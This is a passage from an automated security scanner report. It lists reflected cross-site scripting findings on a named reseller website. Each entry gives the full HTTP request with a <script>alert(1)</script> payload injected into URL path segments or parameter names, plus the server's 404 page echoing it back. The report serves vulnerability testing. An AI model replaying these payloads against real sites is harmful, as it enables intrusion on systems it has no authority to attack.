<p>The requested URL /detail/12/themes/kosmos/images/?11ee8<script>alert(1)</script>5a5e6dbcf25=1 was not found on this server.</p>
...[SNIP]...

2.1034. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5e521<script>alert(1)</script>2ae0de5c4f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail5e521<script>alert(1)</script>2ae0de5c4f3/12/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail5e521<script>alert(1)</script>2ae0de5c4f3/12/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1035. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload beab0<script>alert(1)</script>8334f775e75 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12beab0<script>alert(1)</script>8334f775e75/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12beab0<script>alert(1)</script>8334f775e75/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1036. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6d54b<script>alert(1)</script>abaf1ebbc0d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes6d54b<script>alert(1)</script>abaf1ebbc0d/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes6d54b<script>alert(1)</script>abaf1ebbc0d/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1037. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7f1ac<script>alert(1)</script>ebe64e30b58 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos7f1ac<script>alert(1)</script>ebe64e30b58/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos7f1ac<script>alert(1)</script>ebe64e30b58/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1038. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c5333<script>alert(1)</script>fe5c1543ee6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/imagesc5333<script>alert(1)</script>fe5c1543ee6/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/imagesc5333<script>alert(1)</script>fe5c1543ee6/rating/ was not found on this server.</p>
...[SNIP]...

2.1039. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d963d<script>alert(1)</script>926d16b8144 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/images/ratingd963d<script>alert(1)</script>926d16b8144/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images/ratingd963d<script>alert(1)</script>926d16b8144/ was not found on this server.</p>
...[SNIP]...

2.1040. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload dd616<script>alert(1)</script>69210a0ab04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/images/rating/?dd616<script>alert(1)</script>69210a0ab04=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images/rating/?dd616<script>alert(1)</script>69210a0ab04=1 was not found on this server.</p>
...[SNIP]...

2.1041. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 13e9e<script>alert(1)</script>5dcea266e7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail13e9e<script>alert(1)</script>5dcea266e7a/12/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail13e9e<script>alert(1)</script>5dcea266e7a/12/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1042. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3d224<script>alert(1)</script>eb42a6969bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/123d224<script>alert(1)</script>eb42a6969bd/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/123d224<script>alert(1)</script>eb42a6969bd/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1043. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 82bcd<script>alert(1)</script>5fd79bfeb2d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes82bcd<script>alert(1)</script>5fd79bfeb2d/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes82bcd<script>alert(1)</script>5fd79bfeb2d/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1044. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e74ea<script>alert(1)</script>68a114b4cf1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmose74ea<script>alert(1)</script>68a114b4cf1/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmose74ea<script>alert(1)</script>68a114b4cf1/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1045. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 27c0f<script>alert(1)</script>18f80098625 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/images27c0f<script>alert(1)</script>18f80098625/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images27c0f<script>alert(1)</script>18f80098625/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1046. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 98caf<script>alert(1)</script>365072e6023 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/images/rating98caf<script>alert(1)</script>365072e6023/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images/rating98caf<script>alert(1)</script>365072e6023/0.gif was not found on this server.</p>
...[SNIP]...

2.1047. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/0.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 545e6<script>alert(1)</script>5ad9bf49021 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/images/rating/0.gif545e6<script>alert(1)</script>5ad9bf49021 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images/rating/0.gif545e6<script>alert(1)</script>5ad9bf49021 was not found on this server.</p>
...[SNIP]...

2.1048. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e6909<script>alert(1)</script>366766337b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/images/rating/0.gif?e6909<script>alert(1)</script>366766337b7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images/rating/0.gif?e6909<script>alert(1)</script>366766337b7=1 was not found on this server.</p>
...[SNIP]...

2.1049. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c83d6<script>alert(1)</script>79fc9678776 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailc83d6<script>alert(1)</script>79fc9678776/12/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailc83d6<script>alert(1)</script>79fc9678776/12/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1050. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload adda6<script>alert(1)</script>ab658c181a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12adda6<script>alert(1)</script>ab658c181a3/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12adda6<script>alert(1)</script>ab658c181a3/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1051. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c66c2<script>alert(1)</script>2273f9c2e38 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themesc66c2<script>alert(1)</script>2273f9c2e38/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themesc66c2<script>alert(1)</script>2273f9c2e38/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1052. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fec7f<script>alert(1)</script>4a685c9e8db was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmosfec7f<script>alert(1)</script>4a685c9e8db/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
